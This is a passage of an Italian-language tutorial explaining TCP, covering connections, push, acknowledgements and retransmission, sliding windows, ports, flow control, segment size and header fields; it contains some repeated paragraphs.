concetto di connessione, piuttosto che su quello di indirizzo come fa invece l'IP. Una connessione, per 


definizione, richiede la definizione di due punti piuttosto che di uno solo, detti punti terminali o estremi 
della connessione (endpoint). Parleremo anche di interlocutori per indicare gli utenti posti agli estremi 
della connessione. 

Terzo punto: abbiamo visto che l’IP divide i dati in pacchetti che vengono costruiti sulla base di 
esigenze di trasmissione legate alle varie reti fisiche su cui si poggia il sistema. D’altra parte le 
applicazioni dividono i dati in funzione delle esigenze applicative. Per esempio, un’applicazione di 
posta elettronica può considerare una lettera da 8.000 caratteri una singola unità dati, mentre un 
protocollo per la gestione della rete può avere l’esigenza di spedire tanti piccoli messaggi di non più di 
16 byte l’uno. Il TCP permette di disaccoppiare il modo di dividere i dati delle applicazioni da quello 
dell’IP. Così la lettera di cui sopra viene prima spezzata in tante parti, spedita via IP e poi ricomposta 
dal livello TCP del destinatario, mentre per i messaggi di controllo avviene il contrario: prima vengono 
accumulati in un singolo pacchetto, e poi rispezzettati presso il destinatario. Questo meccanismo è detto 
buffered transfer. Naturalmente può sorgere l’esigenza di forzare la trasmissione dei dati anche se il 
buffer non è pieno. Per esempio, se serve sapere se un certo sistema è attivo o meno manderò prima un 
messaggio di interrogazione, e solo una volta ricevuta la conferma incomincerò a spedire gli altri dati. 
Dato che il messaggio di interrogazione è più piccolo del buffer, esso non verrebbe realmente spedito 
dal TCP fintanto che questi non è stato riempito. È quindi necessario forzare la trasmissione del primo 
messaggio (push) se si vuole evitare di attendere inutilmente la risposta a un messaggio che in realtà 
non è mai partito. 

Quarto punto: per quanto intelligente, il TCP si preoccupa di trasferire i dati che gli vengono passati 
senza entrare in merito a il loro significato dal punto di vista applicativo. In che modo il flusso di dati 
vada interpretato semanticamente è responsabilità delle due applicazioni che utilizzano la connessione 
TCP per cooperare. Questo vuol dire che se un’applicazione manda alla sua controparte una serie di 
indirizzi, questi arriveranno uno di seguito all’altro nel giusto ordine, ma senza alcuna garanzia che 
ogni buffer contenga un numero intero di indirizzi. Sta all’applicazione ricomporre un indirizzo 
capitato a cavallo di due buffer consecutivi. Si parla quindi di flusso senza struttura (Unstructured 
Stream). 

Quinto e ultimo punto: le connessioni TCP permettono il trasferimento contemporaneo dei dati in 
entrambe le direzioni, quello che nel gergo delle comunicazioni si chiama una connessione full-duplex. 
Si hanno cioè due flussi che scorrono indipendentemente in direzioni opposte, senza interagire fra loro. 
Le applicazioni hanno comunque la possibilità di passare alla modalità half duplex semplicemente 
bloccando uno dei due flussi di dati. 

Ma in che modo il TCP garantisce quella affidabilità che manca all’IP? Il meccanismo di base 
utilizzato sia dal TCP che da molti altri protocolli cosiddetti "affidabili" è quello della ritrasmissione in 
caso di mancata conferma (positive acknowledgement with retrasmission). Si tratta di un meccanismo 
concettualmente semplice: ogni qual volta uno dei due interlocutori di una connessione spedisce dei 
dati, questi attende una conferma dell’avvenuta ricezione. Se questa arriva entro un tempo stabilito 
viene spedito il pacchetto successivo, altrimenti l’applicazione rispedisce quello precedente. Tale 
tempo viene misurato con un timer che viene fatto partire ogni volta che un pacchetto è spedito. Questo 
meccanismo risolve il problema dei pacchetti persi o danneggiati, ma può crearne un altro. Supponiamo 
che a causa di problemi di saturazione della rete un pacchetto ci metta molto più tempo del previsto ad 
arrivare. A questo punto il mittente, non vedendosi arrivare indietro la conferma ne rispedisce una 
copia. Succede così che il destinatario riceve a una certa distanza l’uno dall’altro due copie dello stesso 
pacchetto. Il problema della duplicazione dei pacchetti viene risolto facendo numerare sequenzialmente 
al mittente tutti i pacchetti da spedire e facendo verificare al destinatario la sequenza ricevuta. 
Naturalmente questo non vale solo per i messaggi ma anche per le conferme agli stessi. Infatti anche 
una conferma potrebbe venire erroneamente duplicata. Per evitare questo ogni conferma riporta il 
numero di sequenza del messaggio a cui si riferisce, permettendo così al mittente di verificare che a 


ogni messaggio spedito corrisponda una e solo una conferma di ricezione. È un po' lo stesso 
meccanismo di una raccomandata con ricevuta di ritorno. 

In realtà gli algoritmi utilizzati dal TCP sono un po' più complicati, e tengono conto di tutta una serie di 
situazioni che si possono verificare. Senza contare che il tempo di attesa prima della ritrasmissione è un 
punto chiave di tutto il discorso. Se si attende troppo poco si rischia di generare un sacco di duplicati 
inutili, saturando per giunta la rete, mentre se si attende troppo si rischia di abbassare notevolmente e 
inutilmente le prestazioni della trasmissione dei dati, rallentando le applicazioni alle estremità della 
connessione. 

Il meccanismo della conferma di ricezione con ritrasmissione ha inoltre un grosso svantaggio. Anche se 
i tempi di attesa sono scelti in modo ottimale, esso causa un notevole sottoutilizzo della rete. Infatti, 
indipendentemente dalla capacità della rete, i due interlocutori passano la maggior parte del tempo 
attendendo le varie conferme. È un po' come avere un tubo nel quale vengono fatte cadere una a una 
delle palline numerate in sequenza. All’altra estremità del tubo c’è una cesta poggiata su un prato, un 
po' distante dal foro di uscita. Se la pallina cade nella cesta fa rumore, altrimenti cade nel prato e non si 
sente niente. Se ogni volta che metto una pallina nel tubo aspetto di sentire il rumore che mi conferma 
che la pallina è caduta nel cesto, il tubo resta per la maggior parte del tempo vuoto. Una tecnica di 
ottimizzazione usata dal TCP per rendere più efficiente il meccanismo appena descritto è quella delle 
finestre di scorrimento (sliding window). Funziona più o meno in questo modo. Immaginate di 
immettere nel tubo una sequenza di dieci palline senza attendere che la prima sia arrivata. Come si 
sente il primo flop si aggiunge un’undicesima pallina, e poi una dodicesima e così via. Se si salta un 
flop si reinserisce una pallina con lo stesso numero di quella che non è arrivata, tanto il destinatario può 
comunque riordinare le palline utilizzando i numeri scritti sopra. Il numero di palline che compongono 
il trenino da spedire indipendentemente dalla ricezione del flop si chiama dimensione della finestra di 
scorrimento (sliding window size). Se si sceglie una dimensione tale da riempire tutto il tubo nella sua 
lunghezza si sfrutta al massimo la capacità dello stesso. 

In pratica questo sistema divide la sequenza di pacchetti in tre fasce. La prima è rappresentata dai 
pacchetti spediti e di cui si è avuta la conferma di ricezione. La seconda è formata dai pacchetti spediti 
ma dei quali non si sa ancora niente, e la terza è formata dai pacchetti ancora da spedire. Con questa 
tecnica il TCP mantiene un timer per ogni singolo pacchetto che appartiene alla seconda fascia. Il nome 
"Finestra di scorrimento" deriva dal fatto che è come se ci fosse una finestra ampia quanto il trenino di 
pacchetti che possono essere spediti senza attendere la conferma dell’avvenuta ricezione che scorre in 
avanti un pacchetto alla volta ogni qual volta arriva una conferma. Anche in questo caso, come in 
quello del tempo di attesa prima di ritrasmettere un pacchetto, le dimensioni della finestra di 
scorrimento rappresentano un fattore critico per determinare l’efficenza del sistema. In generale, se le 
dimensioni della finestra sono maggiori del tempo di attesa per il singolo pacchetto, allora la finestra 
continua a scorrere regolarmente senza interruzioni, salvo nel caso di ritrasmissioni, e la capacità di 
carico della rete viene sfruttata al massimo. 

Affinché infatti due applicazioni possano comunicare fra di loro esse debbono conoscersi e il sistema 
di trasmissione che le serve deve sapere a chi effettivamente vanno recapitati i dati. È evidente che non 
basta l'indirizzo IP, che identifica univocamente un host nella rete. Basti pensare che un PC collegato in 
rete ha in genere un solo indirizzo IP, a meno che non sia collegato a più reti fisiche, come per esempio 
un gateway. Se una lettera viene spedita via rete a un certo indirizzo come fa TCP a sapere a quale 
applicazione deve far arrivare i dati? Un sistema potrebbe essere quello di assegnare un identificativo a 
ogni singola applicazione, ma come garantire allora l'univocità dell'identificativo? Senza contare che 
questo costringerebbe la controparte a sapere a priori tale valore per ogni possibile destinatario. Non è 
inoltre detto che un utente utilizzi sempre lo stesso programma per spedire o ricevere la posta 
elettronica. In realtà, più che la specifica applicazione, quello che è importante identificare è la 
funzione, come per esempio trasferire file oppure spedire posta elettronica. 


La soluzione è quella di definire dei punti di ingresso e di uscita virtuali chiamati porte. Ogni porta 
rappresenta di fatto un punto di accesso a un'applicazione nel sistema. Si tratta in pratica di 
un'estensione del concetto di porta hardware. Un PC moderno, per esempio, può avere porte hardware 
parallele, seriali, video, audio e di vari altri tipi. Ad ogni porta possono essere attaccati dispositivi 
molto differenti. Per esempio, a una porta parallela è possibile attaccare una stampante, uno scanner, 
un'unità Cd-Rom oppure un'unità disco ad alta capacità. Tutti questi dispositivi non hanno bisogno di 
una porta specifica, ma possono utilizzare la stessa porta perché gestiscono flussi di dati simili, possono 
cioè usare lo stesso protocollo di base per la trasmissione dei dati. Ovviamente, a livello applicativo, 
ogni periferica darà ai propri dati una struttura differente. Questo vuol dire che i dati costruiti per una 
stampante non possono certo essere mandati a uno scanner. D'altra parte anche TCP non entra in merito 
della struttura applicativa dei dati, ma solo alle modalità di trasmissione degli stessi. 

Ogni porta TCP è identificata da un numero. I numeri sotto il 256 sono utilizzati per le cosiddette 
"porte conosciute", cioè porte alle quali è stata assegnata una responsabilità ben precisa, mentre quelli 
al di sopra sono utilizzati per le assegnazioni dinamiche. Avremo per esempio una porta per i servizi di 
posta elettronica X.400 chiamata appunto X400 (103) alla quale faranno riferimento tutte le 
applicazioni che utilizzano tali servizi, oppure le due porte per il trasferimento dei file via FTP, una per 
il controllo (FTP, 21) e una per i dati (FTP-DATA, 20). Una lista delle porte conosciute attualmente 
assegnate è riportata nella RFC 1060, reperibile a ftp://ds.internic.net/rfc/rfc1060.txt Mentre in UDP la 
porta rappresenta un elemento sufficiente alla comunicazione, per cui il protocollo non fa altro che 
smistare i vari datagrammi nelle code dati (queue) associate alle varie porte . Una connessione è 
l'insieme di due punti, detti estremi della connessione (endpoint), ognuno identificato univocamente da 
due coordinate: l'indirizzo IP e il numero di porta. Una connessione è quindi rappresentata da ben 
quattro identificativi: gli indirizzi IP delle due macchine su cui girano le due applicazioni che si 
scambiano i dati, e i rispettivi numeri di porta. È importante capire che l'identificazione della 
connessione richiede tutti e quattro i valori, per cui la stessa porta con lo stesso indirizzo IP può essere 
condivisa simultaneamente da più connessioni senza creare alcun problema o ambiguità. 

Ecco perché in TCP si pensa in termini di linea dedicata. È come se ci fosse un filo che lega 
univocamente i due interlocutori. Ogni interlocutore può avere più connessioni aperte nello stesso 
momento a partire dallo stesso capo purché non ce ne siano due con la stessa controparte. Il vantaggio è 
che una singola applicazione, per esempio di posta elettronica, necessita di una sola porta TCP per 
fornire servizi a molte macchine contemporaneamente attraverso differenti connessioni che 
condividono uno stesso estremo. Va tenuto presente che, anche se UDP e TCP usano gli stessi numeri 
per le porte, non esiste possibilità di confusione, dato che i pacchetti IP portano con sé l'identificativo 
del protocollo utilizzato che è ovviamente diverso per i due protocolli. 

Affinché la connessione venga stabilita, entrambi gli estremi devono dare la loro autorizzazione. 
L'aggancio avviene nel seguente modo. Una delle due applicazioni che si vogliono connettere effettua 
un'apertura passiva (passive open), cioè informa il suo sistema che è disposta ad accettare una richiesta 
di connessione. TCP assegna all'applicazione un numero di porta. L'altra applicazione deve invece 
effettuare un'apertura attiva (active open), specificando l'indirizzo IP e la porta con la quale si vuole 
connettere. A questo punto i due livelli TCP stabiliscono la connessione e verificano che tutto sia a 
posto. 

La gestione dei dati: Vediamo adesso come TCP gestisce i dati. Innanzi tutto, come già detto, TCP 
vede i dati come una sequenza non strutturata di ottetti, cioè byte, detto flusso di dati (data stream). 
Questo flusso viene diviso in segmenti ognuno dei quali viaggia di solito in un singolo pacchetto IP. 
Per aumentare l'efficienza della trasmissione, TCP utilizza una versione particolare del meccanismo a 
finestre di scorrimento spiegato sopra. Ricordo che questo meccanismo consiste nel mandare un 
gruppetto di dati prima di aver ricevuto la conferma di ricezione di ogni singolo pacchetto, in modo da 
tenere costantemente sotto carico la linea. Se infatti si dovesse attendere la conferma di ricezione per 


ogni singolo pacchetto prima di spedire il successivo la linea resterebbe per la maggior parte del tempo 
inutilizzata. Si dà insomma fiducia alla rete, partendo dal presupposto che la perdita di dati sia 
l'eccezione piuttosto che la regola. 

Esistono tuttavia due importanti differenze tra il meccanismo base presentato prima e quello più 
sofisticato utilizzato effettivamente da TCP. 

La prima è che l'unità base per i dati non è né il segmento né il pacchetto IP ma il singolo ottetto. Ogni 
ottetto viene numerato e TCP mantiene tre puntatori per ogni flusso di dati in uscita: uno che separa gli 
ottetti già spediti e arrivati felicemente a destinazione da quelli di cui non si hanno ancora notizie, uno 
che separa quelli già spediti da quelli che devono ancora essere spediti senza attendere la conferma di 
ricezione per i precedenti ottetti, e uno che separa questi ultimi da quelli che non possono essere spediti 
fintanto che la finestra non scorre in avanti. Una serie di informazioni speculari è mantenuta dal 
destinatario che deve ovviamente ricostruire il flusso di dati nel modo corretto indipendentemente 
dall'ordine di arrivo dei dati. Dato che una connessione è full-duplex, TCP manterrà quindi per ogni 
connessione due finestre di scorrimento, una per i dati in uscita e una per quelli in ingresso: un totale di 
quattro finestre per connessione considerando entrambi gli estremi. Esiste quindi un'asimmetria rispetto 
al meccanismo base dove l'unità dati utilizzata nella finestra di scorrimento era la stessa utilizzata nella 
trasmissione. Qui TCP utilizza il segmento come unità dati da trasmettere, mentre ragiona in termini di 
ottetti per quello che riguarda il meccanismo di ritrasmissione. 

La seconda differenza è che le dimensioni della finestra di scorrimento non sono fisse ma variano nel 
tempo in funzione della capacità di ricezione del destinatario. Ogni conferma di ricezione che ritorna al 
mittente contiene una soglia di capacità (window advertisement) che contiene il numero di ulteriori 
ottetti che il destinatario è in grado di ricevere. In pratica questo meccanismo permette di adattare la 
finestra di spedizione alle dimensioni del buffer di ricezione. Si tratta cioè di un meccanismo di 
controllo del flusso dei dati che limita il numero dei dati in ingresso man mano che il buffer di 
ricezione si riempie, fino a poter interrompere momentaneamente la trasmissione nel caso che si sia 
raggiunta la massima capacità di ricezione del destinatario. Basta infatti che il destinatario mandi una 
soglia uguale a zero perché il mittente interrompa la spedizione degli ottetti fino all'arrivo di una 
conferma di ricezione contenente di nuovo una soglia maggiore di zero. 

In realtà il mittente non smette del tutto di mandare dati. Innanzi tutto, se ci sono dati urgenti da 
spedire, il mittente informa comunque il destinatario di tale necessità trasmettendo un segmento con un 
indicatore di urgenza al suo interno. Questo permette al destinatario di prendere delle contromisure per 
ricevere comunque i dati urgenti, per esempio aumentando le dimensioni del buffer. In secondo luogo, 
è sempre possibile che la conferma con soglia positiva che dovrebbe far ripartire la trasmissione dei 
dati vada perduta. Per questo motivo il mittente prova ogni tanto a far partire un segmento per vedere 
se per caso il destinatario è di nuovo pronto a ricevere i dati. 

Il controllo di flusso: Il controllo del flusso dei dati è un aspetto estremamente importante in un sistema 
in cui sono collegate macchine anche molto differenti fra loro per dimensioni e capacità di trasmissione 
. Per controllo del flusso si intende la possibilità di regolare dinamicamente la quantità di dati che 
vengono immessi nella rete. Non solo è importante che il destinatario possa regolare la velocità di 
spedizione in funzione della sua capacità di ricezione, ma è fondamentale che ogni gateway intermedio 
possa frenare il flusso dei dati che riceve per evitare di entrare in saturazione. Il meccanismo appena 
descritto della soglia di capacità permette di risolvere il primo problema, non il secondo. Quest'ultimo è 
detto congestione, ed è estremamente importante perché non tenerne conto vuol dire mandare in tilt la 
rete. 

Lo standard TCP non prevede alcun meccanismo di controllo della congestione, lasciando agli 
implementatori di tale protocollo il non banale compito di sviluppare una logica capace di evitare 
questo tipo di problemi. 


Per quello che riguarda i segmenti, il fatto che TCP sia libero di dividere il flusso in segmenti può a 
volte causare problemi dal punto di vista applicativo. Per esempio, supponiamo di implementare via 
TCP/IP un terminale remoto. Questo vuol dire che tutte le operazioni effettuate con la tastiera e il 
mouse su di una macchina (chiamiamola locale) saranno visibili su di un'altra macchina (remota) come 
se esse fossero state effettuate dalla tastiera e dal mouse della macchina remota. Non solo: sarà 
possibile vedere lo schermo della macchina remota all'interno di una finestra della macchina locale . 
Questo tipo di applicazioni è molto utile per esempio se per un qualche motivo la macchina da 
controllare non ha una sua tastiera oppure si trova in un locale non generalmente accessibile 
all'operatore. È evidente che affinché l'applicazione funzioni essa debba lavorare in tempo reale. Se 
cioè si preme il tasto T sulla tastiera locale, la lettera T deve apparire immediatamente sullo schermo 
della macchina remota, e quindi apparire anche all'interno della finestra locale che riproduce tale 
schermo. Lo stesso se si fa click sul pulsante di chiusura di una finestra. Ovviamente se TCP fosse 
libero di accumulare questi comandi per poi spedirli tutti in una volta l'applicazione sarebbe di difficile 
utilizzo. Infatti, se l'operatore decidesse di chiudere una finestra dello schermo remoto per accedere 
un'icona sottostante e TCP non spedisse il comando fintanto che il buffer di partenza non fosse pieno, 
non sarebbe possibile eseguire l'operazione successiva, cioè 

aprire l'icona sulla scrivania del sistema. Per questo motivo TCP prevede la possibilità di forzare la 
spedizione del buffer (push). Questo tuttavia non è sufficiente. Se infatti TCP che riceve i dati 
accumulasse gli stessi nel buffer di ricezione prima di passarli all'applicazione destinataria saremmo 
punto e da capo. Per questo motivo, quando un segmento è forzato in uscita, TCP imposta a uno un 
certo bit nell'intestazione del segmento in modo che questi possa venire riconosciuto e immediatamente 
passato all'applicazione remota. 

Abbiamo detto che il TCP utilizza il metodo della finestra di scorrimento per tenere la rete sempre 
impegnata al massimo della sua capacità e che esiste un'importante differenza tra il meccanismo 
generale e quello più sofisticato utilizzato effettivamente dal TCP. Tale differenza consiste in 
un'asimmetria rispetto al meccanismo base dove l'unità dati utilizzata nella finestra di scorrimento era 
la stessa utilizzata nella trasmissione. Il TCP utilizza il segmento come unità dati da trasmettere, mentre 
ragiona in termini di ottetti per quello che riguarda il meccanismo di ritrasmissione. Questo comporta 
una complicazione nella gestione delle conferme di ricezione (acknowledgement). 

A causa dell'asimmetria suddetta, la ritrasmissione in caso di mancata ricezione non avviene per 
segmenti, ma a livello di ottetti. Questo vuol dire che un segmento può contenere contemporaneamente 
sia nuovi dati sia una parte dei dati persi in precedenza. Ovviamente a queste condizioni ha poco senso 
numerare semplicemente i segmenti e usare questo identificativo nelle conferme di ricezione. Né è 
pensabile di usare i datagrammi IP a tale scopo, dato che questi sono generalmente di lunghezza fissa 
mentre i vari segmenti TCP sono di lunghezza variabile. Ne consegue che l'unico modo per gestire le 
conferme è quello di ragionare in termini di cursore all'interno del flusso di dati. Come dire "ho 
ricevuto i primi 300 caratteri della lettera che mi hai spedito". 

Ecco che cosa accade: ogni segmento contiene la posizione dell'area dati del segmento TCP all'interno 
del flusso di dati. Tale posizione si chiama numero di sequenza (sequence number) ed è calcolata in 
byte. Il destinatario estrae i vari ottetti dai segmenti ricevuti e li ricompone per ricostruire il flusso dei 
dati, utilizzando i numeri di sequenza per riordinare i vari segmenti. 

Questi possono infatti arrivare in qualunque ordine, o essere andati persi. A questo punto, chi sta 
ricevendo i dati, avrà ricostruito in modo completo una parte del messaggio originario e si ritroverà 
alcuni dati in eccesso che non sono contigui alla parte di flusso ricostruito. Ogni volta che il 
destinatario riceve un segmento, manda indietro nella conferma di ricezione il numero di sequenza 
dell'ottetto che si aspetta di ricevere per continuare la ricostruzione, cioè il valore dell'ultimo ottetto 
della parte contigua ricostruita più uno. 


Immaginate di dover spedire una lettera a un vostro amico. Il TCP negozia con la controparte la 
lunghezza massima del segmento, come vedremo più avanti. Quindi inizia a riempire il primo 
segmento un carattere alla volta. Quando il segmento è pieno viene spedito e viene fatto partire il 
contatore a tempo per quel segmento. Quindi il TCP inizia a riempire il secondo segmento, che parte 
regolarmente, e così dicendo. Man mano che i segmenti partono arrivano dalla controparte le conferme 
di ricezione. Supponiamo che 

a un certo punto, dopo aver spedito 450 ottetti, arrivi per due volte al mittente la conferma che il 
destinatario è riuscito a ricostruire il flusso fino al 300° carattere e che si aspetta il 301°. È evidente che 
qualcosa è andato storto e che si sono persi dei dati. Il TCP allora spedisce un segmento che contiene di 
nuovo dal 301° carattere in poi, diciamo fino al 400°. Dato che i caratteri dal 370° al 450° erano 
comunque arrivati regolarmente, il successivo messaggio di conferma richiederà direttamente il 451° 
carattere, e non il 401°. 

Vantaggi e svantaggi: Un vantaggio è che il valore di conferma è estremamente semplice da calcolare e 
di immediata comprensione. Inoltre, se una conferma di ricezione va persa, non è detto che questo 
causi automaticamente la ritrasmissione dei dati. Ci sarà comunque la conferma successiva che fornirà 
l'indicazione esatta del punto a cui è arrivato il destinatario nel ricostruire il flusso. 

Lo svantaggio più grosso è che il mittente non ha modo di sapere quanti dati siano effettivamente 
arrivati con successo al destinatario, dato che basta un buco nel flusso per far segnalare come validi un 
numero di byte molto inferiore a quelli effettivamente ricevuti. Questo crea seri problemi al mittente, 
che non sa se ritrasmettere tutti i dati successivi, e quindi sprecare tempo a ritrasmettere dati già 
arrivati, o trasmettere solo una piccola parte e aspettare la conferma che il potenziale buco si è chiuso. 
Entrambi gli schemi sono alquanto inefficienti. Sta allo sviluppatore dello stack TCP/IP decidere quali 
algoritmi utilizzare, tenendo presente che un algoritmo troppo complesso ha comunque lo svantaggio di 
avere potenzialmente basse prestazioni. 

Un altro punto importante è il calcolo della lunghezza ottimale del segmento. Abbiamo detto più sopra 
che ogni conferma di ricezione contiene una soglia di capacità (window advertisement) la quale 
specifica il numero di ulteriori ottetti che il destinatario è in grado di ricevere. Questo meccanismo 
permette di adattare la finestra di spedizione alle dimensioni del buffer di ricezione. Tuttavia è anche 
necessario definire la lunghezza del segmento oltre che in funzione delle capacità di trasmissione del 
mittente e di ricezione del destinatario, anche e soprattutto in funzione delle caratteristiche della rete, 
come per esempio la grandezza massima del frame fisico, o Maximum Transfer Unit (MTU). La 
lunghezza massima di un segmento, o Maximum Segment Size (MSS), viene calcolata appunto sulla 
base dell'MTU se entrambi gli estremi della connessione si trovano nella stessa rete fisica, altrimenti lo 
standard raccomanda di utilizzare un valore di 536 byte, equivalente alla dimensione normale di un 
datagramma IP meno le dimensioni standard delle intestazioni IP e TCP sommate insieme, 40 byte 
appunto. 

Tale calcolo è ovviamente solo un primo tentativo di ottimizzare l'utilizzo della rete da parte del TCP. 
Durante la trasmissione il TCP può modificare tale valore in funzione della situazione contingente. Non 
esiste tuttora un algoritmo standard per definire il giusto valore per l'MSS, data la complessità del 
problema. Una cattiva definizione dell'MSS può seriamente penalizzare la comunicazione. Se il 
segmento è troppo piccolo, il rapporto tra i dati trasmessi e quelli utilizzati nella trasmissione stessa è 
sfavorevole. Per esempio, un segmento di cinque byte utilizza solo un ottavo della larghezza di banda 
(bandwidth) disponibile, dato che per ogni cinque byte di dati ce ne sono ben quaranta di intestazione. 
Viceversa, se il segmento è molto grande, altrettanto è il datagramma IP. Se il datagramma è più grande 
dell'MTU, verrà spezzato in più frammenti non indipendenti fra loro, per cui basta che si perda un solo 
frammento per perdere tutto il datagramma e di conseguenza il segmento TCP. 

Il controllo di flusso: Il controllo del flusso dei dati è un aspetto estremamente importante in un sistema 
in cui sono collegate macchine anche molto differenti fra loro per dimensioni e capacità di trasmissione 


. Per controllo del flusso si intende la possibilità di regolare dinamicamente la quantità di dati che 
vengono immessi nella rete. Non solo è importante che il destinatario possa regolare la velocità di 
spedizione in funzione della sua capacità di ricezione, ma è fondamentale che ogni gateway intermedio 
possa frenare il flusso dei dati che riceve per evitare di entrare in saturazione. Il meccanismo descritto 
della soglia di capacità permette di risolvere il primo problema ma non il secondo. Quest'ultimo è detto 
congestione, ed è estremamente importante perché non tenerne conto vuol dire mandare in tilt la rete. 
Lo standard TCP non prevede alcun meccanismo di controllo della congestione, lasciando agli 
implementatori di tale protocollo il non banale compito di sviluppare una logica capace di evitare 
questo tipo di problemi. 

Per quello che riguarda i segmenti, il fatto che il TCP sia libero di dividere il flusso in segmenti può a 
volte causare problemi dal punto di vista applicativo. Per esempio, supponiamo di implementare via 
TCP/IP un terminale remoto. Questo vuol dire che tutte le operazioni effettuate con la tastiera e il 
mouse su di una macchina (chiamiamola locale) saranno visibili su di un'altra macchina (remota) come 
se esse fossero state effettuate dalla tastiera e dal mouse della macchina remota. Non solo: sarà 
possibile vedere lo schermo della macchina remota all'interno di una finestra della macchina locale . 
Questo tipo di applicazioni è molto utile per esempio se per un qualche motivo la macchina da 
controllare non ha una sua tastiera oppure si trova in un locale non generalmente accessibile 
all'operatore. È evidente che affinché l'applicazione funzioni essa debba lavorare in tempo reale. Se 
cioè si preme il tasto T sulla tastiera locale, la lettera T deve apparire immediatamente sullo schermo 
della macchina remota, e quindi apparire anche 

all'interno della finestra locale che riproduce tale schermo. Lo stesso se si fa click sul pulsante di 
chiusura di una finestra. Ovviamente se il TCP fosse libero di accumulare questi comandi per poi 
spedirli tutti in una volta l'applicazione sarebbe di difficile utilizzo. Infatti, se l'operatore decidesse di 
chiudere una finestra dello schermo remoto per accedere un'icona sottostante e il TCP non spedisse il 
comando fintanto che il buffer di partenza non fosse pieno, non sarebbe possibile eseguire l'operazione 
successiva, cioè aprire l'icona sulla scrivania del sistema. Per questo motivo il TCP prevede la 
possibilità di forzare la spedizione del buffer (push). Questo tuttavia non è sufficiente. Se infatti il TCP 
che riceve i dati accumulasse gli stessi nel buffer di ricezione prima di passarli all'applicazione 
destinataria saremmo punto e da capo. Per questo motivo, quando un segmento è forzato in uscita, il 
TCP imposta a uno un certo bit nell'intestazione del segmento in modo che questi possa venire 
riconosciuto e immediatamente passato all'applicazione remota. Esiste poi la possibilità che il TCP 
debba spedire dei dati che non fanno parte del flusso normale e che vanno immediatamente gestiti dalla 
controparte indipendentemente dallo stato in cui si trova la ricostruzione del messaggio originario. Tali 
dati sono detti urgenti, e anche in questo caso esiste un bit nell'intestazione del segmento che informa il 
destinatario del fatto che il segmento va gestito immediatamente. Il concetto è analogo a quello del 
BREAK da tastiera. Se avete lanciato un 

programma che va in loop è necessario poterlo interrompere senza dover far ripartire il sistema. Su 
molti sistemi operativi basta premere una sequenza di tasti, come per esempio Control-C (AC) per 
bloccare l'esecuzione del programma. Similarmente, se un estremo della connessione deve bloccare (0 
sbloccare) l'elaborazione del flusso di dati dall'altra parte, dovrà poter mandare un messaggio urgente 
che abbia la precedenza rispetto ai normali segmenti di dati. Si dice che tale messaggio è fuori banda 
(out of band). 

Benché il TCP presenti all’utente una visione continua dei dati, detta flusso, l’unità di trasferimento dei 
dati del TCP è il segmento. Un segmento è formato come al solito da una intestazione e da un’area dati. 
Al contrario del datagramma IP, il segmento ha dimensioni variabili nel tempo, cioè i vari segmenti 
spediti a fronte di uno stesso flusso possono avere lunghezze differenti. I segmenti sono utilizzati dal 
TCP per aprire e chiudere una connessione, trasferire dati, spedire conferme di ricezione e modificare 
la finestra di spedizione, quel meccanismo che garantisce un utilizzo ottimale della rete, come spiegato 


in precedenza. Due caratteristiche peculiari del TCP sono che lo stesso segmento può portare 
contemporaneamente sia dati veri e propri sia dati di controllo, e che le informazioni di controllo 
possono riferirsi sia allo stesso flusso dell’area dati, sia al flusso opposto (piggybacking). 
L’intestazione: Innanzitutto abbiamo i numeri di porta del mittente e del destinatario, esattamente come 
nell’UDP. Come già nell’UDP, infatti, gli indirizzi IP delle due controparti sono contenuti 
nell’intestazione del datagramma IP. Al contrario di quanto avveniva nell’UDP, tuttavia, la conoscenza 
da parte del TCP degli indirizzi IP non rompe il paradigma che vuole un certo isolamento fra le 
responsabilità dei vari livelli dello stack. Il TCP infatti, architetturalmente, ragiona in termini di 
connessioni, e queste comprendono sia l’informazione relativa alle porte, sia quella relativa agli 
indirizzi IP. Anzi, ogni qual volta l'IP consegna un segmento al TCP, gli passa anche gli indirizzi IP 
contenuti nell’intestazione del datagramma. 

Anche nel caso del segmento TCP la verifica della correttezza dell’intestazione da parte del destinatario 
viene effettuata utilizzando un meccanismo di somma di controllo con pseudointestazione. All’interno 
dell’intestazione TCP, infatti, esiste un campo chiamato somma di controllo (checksum). Il TCP 
imposta inizialmente tale campo di 16 bit a zero. Costruisce quindi una psedointestazione che contiene 
gli indirizzi IP del mittente e del destinatario, il numero di protocollo del sottosistema di trasmissione 
(nel caso del TCP basato su IP è sei) e la lunghezza del segmento TCP compresa l’intestazione. A 
questo punto appende alla pseudo intestazione il segmento IP e aggiunge alla fine dello stesso tanti zeri 
quanti ne servono per far sì che il blocco risultante sia un multiplo di parole da 16 bit (padding). Divide 
quindi il blocco in parole da 16 bit e ne calcola la somma a complemento uno. Il risultato viene quindi 
salvato nel campo apposito dell’intestazione e sia la pseudointestazione sia i bit aggiunti in fondo 
vengono rimossi prima di spedire il segmento. Il destinatario ovviamente effettuerà un calcolo analogo 
per verificare che il valore di controllo così ottenuto corrisponda con quello arrivato nell’intestazione 
del segmento. 

Nell’intestazione ci sono tre campi calcolati in ottetti. Il primo è il numero di sequenza (sequence 
number), che rappresenta la posizione dell’area dati del segmento TCP all’interno del flusso di dati. Il 
secondo è il numero di conferma (acknowledgement number), ovverosia il numero di sequenza 
dell’ottetto che il mittente si aspetta di ricevere per continuare la ricostruzione. Da notare che tale 
valore corrisponde al flusso opposto rispetto a quello in cui viaggia il segmento che lo contiene. Il terzo 
campo è il puntatore ai dati "urgenti". Come detto prima, è possibile che il TCP debba spedire dei dati 
urgenti che vanno elaborati indipendentemente dal flusso normale di dati, e con priorità rispetto a 
quest’ultimo. In questo caso il segmento contiene un segnalatore (flag) che informa il destinatario della 
presenza d’informazioni urgenti nell’area dati. I dati urgenti sono posizionati all’inizio dell’area dati, e 
il puntatore in questione indica dove tali dati finiscono e dove ricominciano i dati normali, se ce ne 
sono. 

I segnalatori: Separati da un’area riservata per usi futuri c’è il campo che contiene la posizione 
dell’area dati nel segmento e un blocco di sei segnalatori. Il primo, misurato in parole da 32 bit, indica 
di fatto la lunghezza dell’intestazione del segmento in tale unità di misura. questo campo è necessario 
in quanto in fondo all’intestazione esiste una zona riservata a eventuali opzioni che rende la lunghezza 
dell’intestazione non fissata a priori. Il secondo campo contiene invece sei indicatori. Data infatti nel 
segmento la presenza contemporanea, almeno in potenza, sia di dati di controllo sia di dati applicativi 
normali e urgenti, è necessario utilizzare dei segnalatori per informare il destinatario su cosa 
effettivamente contiene il segmento. Tutti i segnalatori sono attivi se impostati a uno, inattivi 
altrimenti. Il primo segnalatore indica se l’area dati contiene dati urgenti. Il secondo indica la presenza 
